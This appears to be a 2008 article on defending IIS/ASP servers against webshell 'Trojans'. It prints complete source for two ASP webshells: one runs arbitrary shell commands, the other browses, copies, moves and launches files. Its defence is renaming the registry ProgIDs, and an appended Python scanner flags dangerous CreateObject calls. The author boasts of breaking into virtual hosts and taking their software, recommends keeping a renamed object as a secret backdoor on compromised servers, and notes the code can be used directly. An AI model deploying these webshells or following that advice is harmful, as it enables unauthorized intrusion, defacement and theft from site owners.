Asp server how to guard against Trojan

Author:    Updated:2008-10-27 12:25:12
With the development of ASP and network technology, more and more web sites are built on ASP, and ASP support in IIS can be said to be a basic function of a Windows server. At the same time, ASP-based backdoor Trojans are becoming more common and more powerful. Because the ASP server itself provides script execution as a service, an ASP script backdoor is not detected or removed by antivirus software; hackers call it "the backdoor that is never killed". Its high concealment and the difficulty of removing it pose a serious security threat to web sites, so preventing and removing ASP Trojans places higher technical demands on administrators. Drawing on my own experience, I will discuss two typical ASP Trojans and the ways to guard against them, in the hope that this is of some help.
The following is the code of the first Trojan:
<%@ Language=VBScript %>
<title>ASP Shell</title>
<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- Create the COM objects that we will be using --
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' -- Check for a command that we have posted --
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
' -- Use a poor man's pipe ... a temp file --
szTempFile = "C:\" & oFileSys.GetTempName()
Call oScript.Run("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile(szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="执行命令">
</FORM>
<PRE><%
If (IsObject(oFile)) Then
' -- Read the output from our command and remove the temp file --
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</PRE>
</BODY>
</HTML>
After running it, as shown in the screenshot: type the DIR command in the command box and click Execute, and the directory listing is displayed. It can run a variety of DOS commands, such as copy, net, netstat and so on.
However, by default it runs only with Guest-level permissions, that is, the rights of the IUSR_COMPUTER user. Of course, if IUSR_COMPUTER has been added to the Administrators group, you then have administrator privileges. What characterises this Trojan is how convenient it is to use: almost anything you could do in a DOS command window can be done with it. However, if the server restricts FSO (or does not allow uploaded components), it cannot be used, and on most virtual hosts there is no way to use it; it only works on the "Default Web Site", so its scope of application is relatively narrow.
To guard against it, let us look at the code it relies on:
Set oScript = Server.CreateObject("WSCRIPT.SHELL")   ' creates oScript, a WSCRIPT.SHELL object used to execute commands
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
These three lines create the three objects WSCRIPT.SHELL, WSCRIPT.NETWORK and Scripting.FileSystemObject. As long as we rename or delete the WSCRIPT.SHELL object's entry in the registry, the Trojan cannot run (see the screenshot). Note that both "WSCRIPT.SHELL" and "WSCRIPT.SHELL.1" must be renamed or deleted: if we only modify the "WSCRIPT.SHELL" entry, a hacker only needs to change the code to Set oScript = Server.CreateObject("WSCRIPT.SHELL.1") and the backdoor Trojan works again.
You may also have realised that whatever we rename "WSCRIPT.SHELL" and "WSCRIPT.SHELL.1" to can still be guessed by a hacker. For example, if you rename "WSCRIPT.SHELL" to "WSCRIPT.SHELL888", a hacker only needs to change the code to Set oScript = Server.CreateObject("WSCRIPT.SHELL888") and the Trojan runs. Also, after modifying the registry you must restart the web service for the setting to take effect.
Next, let us look at the ASP code of a second backdoor Trojan:
<% response.write "<font size=6 color=red>can only run one xx for</font>" %>
<% response.write now() %><br>Physical path of this program:
<% response.write request.servervariables("APPL_PHYSICAL_PATH") %>
<html>
<title>asps shell.application backdoor</title>
<body>
<form action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=text value="<%= szCMD %>"> enter the directory to browse<br>
<input type=text name=text1 value="<%= szCMD1 %>">
copy
<input type=text name=text2 value="<%= szCMD2 %>"><br>
<input type=text name=text3 value="<%= szCMD3 %>">
move
<input type=text name=text4 value="<%= szCMD4 %>"><br>
Path: <input type=text name=text5 value="<%= szCMD5 %>">
Program: <input type=text name=text6 value="<%= szCMD6 %>"><br>
<input type=submit name=sb value=发送命令>
</form>
</body>
</html>
<%
szCMD = Request.Form("text")   ' directory browsing
if (szCMD <> "") then
set shell = server.createobject("shell.application")   ' create the shell object
set fod1 = shell.namespace(szcmd)
set foditems = fod1.items
for each co in foditems
response.write "<font color=red>" & co.path & "-----" & co.size & "</font><br>"
next
end if
%>
<%
szCMD1 = Request.Form("text1")   ' copy a directory (files cannot be copied)
szCMD2 = Request.Form("text2")
if szcmd1 <> "" and szcmd2 <> "" then
set shell1 = server.createobject("shell.application")   ' create the shell object
set fod1 = shell1.namespace(szcmd2)
for i = len(szcmd1) to 1 step -1
if mid(szcmd1, i, 1) = "\" then
path = left(szcmd1, i - 1)
exit for
end if
next
if len(path) = 2 then path = path & "\"
path2 = right(szcmd1, len(szcmd1) - i)
set fod2 = shell1.namespace(path)
set foditem = fod2.parsename(path2)
fod1.copyhere foditem
response.write "command completed success!"
end if
%>
<%
szCMD3 = Request.Form("text3")   ' move a directory
szCMD4 = Request.Form("text4")
if szcmd3 <> "" and szcmd4 <> "" then
set shell2 = server.createobject("shell.application")   ' create the shell object
set fod1 = shell2.namespace(szcmd4)
for i = len(szcmd3) to 1 step -1
if mid(szcmd3, i, 1) = "\" then
path = left(szcmd3, i - 1)
exit for
end if
next
if len(path) = 2 then path = path & "\"
path2 = right(szcmd3, len(szcmd3) - i)
set fod2 = shell2.namespace(path)
set foditem = fod2.parsename(path2)
fod1.movehere foditem
response.write "command completed success!"
end if
%>
<%
szCMD5 = Request.Form("text5")   ' run a program at the specified path
szCMD6 = Request.Form("text6")
if szcmd5 <> "" and szcmd6 <> "" then
set shell3 = server.createobject("shell.application")   ' create the shell object
shell3.namespace(szcmd5).items.item(szcmd6).invokeverb
response.write "command completed success!"
end if
%>
To view a directory, just enter the directory path and click Send Command. This Trojan can COPY and MOVE files and run programs, but many commands, such as del, net and netstat, are not available. Its functionality is simple, but it is enough to deface a site: for example, we can MOVE the web site's home page somewhere else and then COPY a page of the same name from the hacker's site into its place.

This Trojan is the most deadly because it works on any virtual host: as long as I am a user with space on a virtual server, I can upload the Trojan and use it to modify any other user's home page. So if the virtual hosting provider has not patched this, it is really finished.
However, in practice I have found that many of China's virtual hosting providers, especially a number of small providers, have not patched this. I took advantage of this loophole to obtain admin on many virtual servers, and then helped them fix the loophole. Of course, I also got what I wanted: a lot of good software and code. Many of the ASP programs I use were "stolen" from them in this way; "stolen" sounds too harsh, it should be called "downloaded".
Back to the topic: what do we do to guard against this ASP backdoor Trojan? Look at this line of its code: set shell = server.createobject("shell.application"). In exactly the same way as before, we rename or delete the "shell.application" and "shell.application.1" items in the registry. Remember, if you rename them, the new name should be somewhat complex so that hackers cannot guess it. By the way, if you patch a "broiler" in this way, it is best to write down the new name, which becomes a backdoor known only to you. Finally, to sum up these two ASP backdoor Trojans and how to guard against them: the first Trojan is functionally powerful but narrow in scope, because it needs FSO, that is, "Scripting.FileSystemObject", support. The second is less functional, but it creates the "shell.application" object and works on any virtual host. (This one really does a great deal of harm; administrators providing ASP hosting should pay attention!)

In fact, from the two defences above we can see that to guard against ASP backdoor Trojans we only need to rename or delete, in the registry, "shell.application", "WSCRIPT.SHELL" and the other dangerous script objects (they are what the script uses to open a command channel). That is, by restricting the creation of "script shells" on the system, ASP Trojans can no longer run.
Note: the code above can be copied and saved as ASP files and used directly.
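The registry renaming described above for the WSCRIPT.SHELL Trojan and again for the shell.application Trojan has the weakness the article itself points out: a renamed ProgID can be guessed. A complementary check is to look for the CreateObject() calls in the web root itself. The following Python scanner is an added example, not code from the article or from any tool it mentions: it reports every CreateObject() whose ProgID is one of the dangerous objects named on this page or their ".1" names, a renamed variant such as WSCRIPT.SHELL888, a ProgID missing from an assumed allowlist, or an argument that is not a string literal and so cannot be classified statically. The allowlist, the sample ASP text and the file extensions scanned are assumptions.

```python
"""Scan ASP source for CreateObject() calls that open a script 'shell' channel.

Added example, not code from the original article. It complements the
registry rename by finding the calls themselves in the web root.
"""
import re
from pathlib import Path

# Objects that give an ASP page command or file-system access (the ones both
# Trojans on this page create). The ".1" names are listed separately because
# the article shows that renaming only the unversioned ProgID is bypassed with
# CreateObject("WSCRIPT.SHELL.1").
DANGEROUS_PROGIDS = {
    "wscript.shell", "wscript.shell.1",
    "wscript.network", "wscript.network.1",
    "shell.application", "shell.application.1",
    "scripting.filesystemobject",
}
# Prefixes used to catch renamed variants such as "wscript.shell888".
DANGEROUS_PREFIXES = ("wscript.shell", "wscript.network", "shell.application",
                      "scripting.filesystemobject")
# ProgIDs an ordinary ASP application is expected to create (assumed allowlist;
# extend it for the application being audited).
ALLOWED_PROGIDS = {
    "adodb.connection", "adodb.recordset", "adodb.command", "adodb.stream",
    "msxml2.domdocument", "msxml2.serverxmlhttp",
}

# Matches "CreateObject ( ... )" with the article's loose spacing, any case.
CALL_RE = re.compile(r"createobject\s*\(([^)]*)\)", re.IGNORECASE)
# A single double-quoted string literal and nothing else.
LITERAL_RE = re.compile(r'^\s*"([^"]*)"\s*$')


def classify(progid):
    """Return a verdict for a literal ProgID, or None if it is allowlisted."""
    p = progid.strip().lower()
    if p in DANGEROUS_PROGIDS:
        return "dangerous"
    if p.startswith(DANGEROUS_PREFIXES):
        return "suspicious-variant"   # e.g. the renamed WSCRIPT.SHELL888
    if p in ALLOWED_PROGIDS:
        return None
    return "unknown"


def scan_asp(source):
    """Return (line number, ProgID text, verdict) for every call worth reporting."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for match in CALL_RE.finditer(line):
            arg = match.group(1)
            literal = LITERAL_RE.match(arg)
            if literal is None:
                # Variable or concatenated ProgID: cannot be classified, so report it.
                findings.append((lineno, arg.strip(), "dynamic-progid"))
                continue
            verdict = classify(literal.group(1))
            if verdict is not None:
                findings.append((lineno, literal.group(1), verdict))
    return findings


def scan_tree(root):
    """Scan every .asp/.asa/.inc file under root; returns {path: findings}."""
    results = {}
    for path in Path(root).rglob("*"):
        if path.suffix.lower() in (".asp", ".asa", ".inc") and path.is_file():
            findings = scan_asp(path.read_text(encoding="utf-8", errors="replace"))
            if findings:
                results[str(path)] = findings
    return results


# Constructed sample: one benign ADODB call, lines modelled on the two Trojans
# above (spacing copied from the article), a renamed ProgID, a ProgID held in
# a variable, and an unlisted ProgID.
SAMPLE_ASP = '''<%
Set conn = Server.CreateObject("ADODB.Connection")
Set oScript = Server.CreateObject ( "WSCRIPT.SHELL")
Set oScript = Server.CreateObject("WSCRIPT.SHELL.1")
Set oScript = Server.CreateObject("WSCRIPT.SHELL888")
set shell = server.createobject ( "shell.application")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Set o = Server.CreateObject(objName)
Set x = CreateObject("Acme.Widget")
%>'''

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        for path, findings in scan_tree(sys.argv[1]).items():
            for lineno, progid, verdict in findings:
                print(f"{path}:{lineno}: {verdict}: {progid}")
    else:
        for lineno, progid, verdict in scan_asp(SAMPLE_ASP):
            print(f"sample.asp:{lineno}: {verdict}: {progid}")
```

Run it with the path of an IIS web root to scan real files, or with no argument to scan the built-in sample. The same ProgID list is what to check under HKEY_CLASSES_ROOT on the server after renaming or deleting the entries, and "dynamic-progid" hits deserve a manual look because a static scan cannot tell what they create.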